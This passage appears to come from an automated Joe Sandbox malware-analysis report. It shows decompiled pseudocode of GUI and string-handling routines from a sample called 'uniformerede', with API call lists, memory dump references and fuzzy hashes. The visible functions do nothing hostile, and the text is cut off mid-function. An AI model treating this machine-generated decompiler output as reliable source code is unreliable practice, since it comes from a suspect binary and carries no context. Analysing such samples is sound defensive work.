                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                            				short _t28;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct tagPOINT* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __ecx;
                                                                                                                                                                                                                            				_t7 = __eax;
                                                                                                                                                                                                                            				_t31 = _t30 + 0xfffffff8;
                                                                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                                                                            				_t19 = __eax;
                                                                                                                                                                                                                            				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((short*)(__eax + 0x44)) = __edx;
                                                                                                                                                                                                                            					if(__edx != 0) {
                                                                                                                                                                                                                            						L5:
                                                                                                                                                                                                                            						_t7 = SetCursor(E004586EC(_t19, _t28));
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						GetCursorPos(_t31);
                                                                                                                                                                                                                            						_push(_v24.y);
                                                                                                                                                                                                                            						_t27 = WindowFromPoint(_v24);
                                                                                                                                                                                                                            						if(_t27 == 0) {
                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                                                                                                                                                                            							if(_t12 != GetCurrentThreadId()) {
                                                                                                                                                                                                                            								goto L5;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32 ref: 0045872F
                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 0045876A
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 00458781
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00458793
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770779139-0
                                                                                                                                                                                                                            • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                                                                                                                                                                                            • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v80;
                                                                                                                                                                                                                            				struct tagRECT _v96;
                                                                                                                                                                                                                            				struct tagRECT _v112;
                                                                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                                                                            				long _v120;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                            				struct HBRUSH__* _t97;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                            				void* _t148;
                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                            				intOrPtr _t153;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t148 = __esi;
                                                                                                                                                                                                                            				_t147 = __edi;
                                                                                                                                                                                                                            				_t138 = __edx;
                                                                                                                                                                                                                            				_t127 = __ebx;
                                                                                                                                                                                                                            				_t150 = _t152;
                                                                                                                                                                                                                            				_t153 = _t152 + 0xffffff8c;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t68 =  *_v12 - 0xf;
                                                                                                                                                                                                                            				if(_t68 == 0) {
                                                                                                                                                                                                                            					_v16 =  *(_v12 + 4);
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t150);
                                                                                                                                                                                                                            					_push(0x454436);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t153;
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                                                                                                                                                                                                            						E0043AAC0(_v8,  &_v120,  &_v96);
                                                                                                                                                                                                                            						_v96.left = _v120;
                                                                                                                                                                                                                            						_v96.top = _v116;
                                                                                                                                                                                                                            						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
                                                                                                                                                                                                                            					_pop(_t140);
                                                                                                                                                                                                                            					 *[fs:eax] = _t140;
                                                                                                                                                                                                                            					_push(0x454444);
                                                                                                                                                                                                                            					if(_v16 == 0) {
                                                                                                                                                                                                                            						return EndPaint( *(_v8 + 0x254),  &_v80);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t94 = _t68 - 5;
                                                                                                                                                                                                                            					if(_t94 == 0) {
                                                                                                                                                                                                                            						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0x44))();
                                                                                                                                                                                                                            						FillRect( *(_v12 + 4),  &_v112, _t97);
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                                                                                                                                                                                                            							GetClientRect( *(_v8 + 0x254),  &_v96);
                                                                                                                                                                                                                            							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t105 = _v12;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t118 = _t94 - 0x2b;
                                                                                                                                                                                                                            						if(_t118 == 0) {
                                                                                                                                                                                                                            							E004541DC(_t150);
                                                                                                                                                                                                                            							_t105 = _v8;
                                                                                                                                                                                                                            							if( *((char*)(_t105 + 0x22f)) == 2) {
                                                                                                                                                                                                                            								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
                                                                                                                                                                                                                            									_t146 = 1;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t146 = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t105 = E0045152C( *(_v8 + 0x254), _t146);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_t118 != 0x45) {
                                                                                                                                                                                                                            								_t105 = E004541DC(_t150);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E004541DC(_t150);
                                                                                                                                                                                                                            								_t105 = _v12;
                                                                                                                                                                                                                            								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                                                                                                                                                                                                            									_t105 = _v12;
                                                                                                                                                                                                                            									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t105;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 901200654-0
                                                                                                                                                                                                                            • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                                                                                                                                                                                            • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _v260;
                                                                                                                                                                                                                            				char _v768;
                                                                                                                                                                                                                            				char _v772;
                                                                                                                                                                                                                            				short* _v776;
                                                                                                                                                                                                                            				intOrPtr _v780;
                                                                                                                                                                                                                            				char _v784;
                                                                                                                                                                                                                            				signed int _v788;
                                                                                                                                                                                                                            				signed short* _v792;
                                                                                                                                                                                                                            				char _v796;
                                                                                                                                                                                                                            				char _v800;
                                                                                                                                                                                                                            				intOrPtr* _v804;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed char _t47;
                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                            				intOrPtr* _t91;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                            				intOrPtr* _t108;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				char* _t114;
                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                                                                            				_v780 = __ecx;
                                                                                                                                                                                                                            				_t91 = __edx;
                                                                                                                                                                                                                            				_v776 = __eax;
                                                                                                                                                                                                                            				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                                                                                                                                            					E00410638(0x80070057);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t47 =  *_t91;
                                                                                                                                                                                                                            				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                                                                                                                                            					_push(_t91);
                                                                                                                                                                                                                            					_push(_v776);
                                                                                                                                                                                                                            					L0040F328();
                                                                                                                                                                                                                            					return E00410638(_v776);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((_t47 & 0x00000040) == 0) {
                                                                                                                                                                                                                            						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v788 =  *_v792 & 0x0000ffff;
                                                                                                                                                                                                                            					_t93 = _v788 - 1;
                                                                                                                                                                                                                            					if(_t93 < 0) {
                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                            						_push( &_v772);
                                                                                                                                                                                                                            						_t54 = _v788;
                                                                                                                                                                                                                            						_push(_t54);
                                                                                                                                                                                                                            						_push(0xc);
                                                                                                                                                                                                                            						L0040F784();
                                                                                                                                                                                                                            						_t113 = _t54;
                                                                                                                                                                                                                            						if(_t113 == 0) {
                                                                                                                                                                                                                            							E00410390(_t100);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004109E8(_v776);
                                                                                                                                                                                                                            						 *_v776 = 0x200c;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                                                                                                                                            						_t95 = _v788 - 1;
                                                                                                                                                                                                                            						if(_t95 < 0) {
                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                            							_t97 = _v788 - 1;
                                                                                                                                                                                                                            							if(E00410B08(_v788 - 1, _t115) != 0) {
                                                                                                                                                                                                                            								L0040F79C();
                                                                                                                                                                                                                            								E00410638(_v792);
                                                                                                                                                                                                                            								L0040F79C();
                                                                                                                                                                                                                            								E00410638( &_v260);
                                                                                                                                                                                                                            								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t62 = E00410B38(_t97, _t115);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t98 = _t95 + 1;
                                                                                                                                                                                                                            							_t73 =  &_v768;
                                                                                                                                                                                                                            							_t108 =  &_v260;
                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                            								 *_t108 =  *_t73;
                                                                                                                                                                                                                            								_t108 = _t108 + 4;
                                                                                                                                                                                                                            								_t73 = _t73 + 8;
                                                                                                                                                                                                                            								_t98 = _t98 - 1;
                                                                                                                                                                                                                            							} while (_t98 != 0);
                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							} while (_t62 != 0);
                                                                                                                                                                                                                            							return _t62;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t99 = _t93 + 1;
                                                                                                                                                                                                                            						_t112 = 0;
                                                                                                                                                                                                                            						_t114 =  &_v772;
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							_v804 = _t114;
                                                                                                                                                                                                                            							_push(_v804 + 4);
                                                                                                                                                                                                                            							_t18 = _t112 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v792);
                                                                                                                                                                                                                            							L0040F78C();
                                                                                                                                                                                                                            							E00410638(_v792);
                                                                                                                                                                                                                            							_push( &_v784);
                                                                                                                                                                                                                            							_t21 = _t112 + 1; // 0x1
                                                                                                                                                                                                                            							_push(_v792);
                                                                                                                                                                                                                            							L0040F794();
                                                                                                                                                                                                                            							E00410638(_v792);
                                                                                                                                                                                                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                                                                                                                                            							_t112 = _t112 + 1;
                                                                                                                                                                                                                            							_t114 = _t114 + 8;
                                                                                                                                                                                                                            							_t99 = _t99 - 1;
                                                                                                                                                                                                                            						} while (_t99 != 0);
                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





























                                                                                                                                                                                                                            0x00410c22
                                                                                                                                                                                                                            0x00410c2c
                                                                                                                                                                                                                            0x00410c2d
                                                                                                                                                                                                                            0x00410c32
                                                                                                                                                                                                                            0x00410c3d
                                                                                                                                                                                                                            0x00410c3e
                                                                                                                                                                                                                            0x00410c48
                                                                                                                                                                                                                            0x00410c49
                                                                                                                                                                                                                            0x00410c4e
                                                                                                                                                                                                                            0x00410c69
                                                                                                                                                                                                                            0x00410c6b
                                                                                                                                                                                                                            0x00410c6c
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410c10
                                                                                                                                                                                                                            0x00410c05

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                                                                                                            • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                                                                                                                                                                                            • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				char _t72;
                                                                                                                                                                                                                            				char _t73;
                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                            				CHAR** _t94;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t96 = _t97;
                                                                                                                                                                                                                            				_t98 = _t97 + 0xfffffff4;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t71 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t94 =  &_v12;
                                                                                                                                                                                                                            				 *[fs:eax] = _t98;
                                                                                                                                                                                                                            				E0041BEF0(_v8);
                                                                                                                                                                                                                            				 *[fs:eax] = _t98;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
                                                                                                                                                                                                                            				 *_t94 = E00404E80(_t71);
                                                                                                                                                                                                                            				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                                                                                                                                                                                            					 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_t72 =  *( *_t94);
                                                                                                                                                                                                                            					if(_t72 == 0) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t72 != E0041CFA4(_v8)) {
                                                                                                                                                                                                                            						_t91 =  *_t94;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t73 =  *( *_t94);
                                                                                                                                                                                                                            							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E00404AB0( &_v16,  *_t94 - _t91, _t91);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            					while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                                                                                                                                                                                            						 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(E0041CF8C(_v8) ==  *( *_t94)) {
                                                                                                                                                                                                                            						if( *(CharNextA( *_t94)) == 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                            							 *_t94 = CharNextA( *_t94);
                                                                                                                                                                                                                            						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t88);
                                                                                                                                                                                                                            				 *[fs:eax] = _t88;
                                                                                                                                                                                                                            				_push(E0041CF65);
                                                                                                                                                                                                                            				return E0041BFAC(_v8);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x0041cec3
                                                                                                                                                                                                                            0x0041cec8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cedf
                                                                                                                                                                                                                            0x0041ce9d
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x0041ceec
                                                                                                                                                                                                                            0x0041cefb
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cf10
                                                                                                                                                                                                                            0x0041cf1d
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041cf31
                                                                                                                                                                                                                            0x0041cf38
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041cf10
                                                                                                                                                                                                                            0x0041cf4a
                                                                                                                                                                                                                            0x0041cf4d
                                                                                                                                                                                                                            0x0041cf50
                                                                                                                                                                                                                            0x0041cf5d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-3916222277
                                                                                                                                                                                                                            • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                                                            • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed short _v44;
                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                            				signed short _t38;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed short _t43;
                                                                                                                                                                                                                            				signed int* _t47;
                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t68 = _t69;
                                                                                                                                                                                                                            				_t70 = _t69 + 0xffffff90;
                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t47 = _a8;
                                                                                                                                                                                                                            				_v24 = _v16 << 4;
                                                                                                                                                                                                                            				_v20 = E00408D24(_v24, __eflags);
                                                                                                                                                                                                                            				 *[fs:edx] = _t70;
                                                                                                                                                                                                                            				_t51 = _v24;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
                                                                                                                                                                                                                            				if(( *_t47 | _t47[1]) != 0) {
                                                                                                                                                                                                                            					_t36 = _a4;
                                                                                                                                                                                                                            					 *_t36 =  *_t47;
                                                                                                                                                                                                                            					 *(_t36 + 4) = _t47[1];
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *_a4 = GetSystemMetrics(0xb);
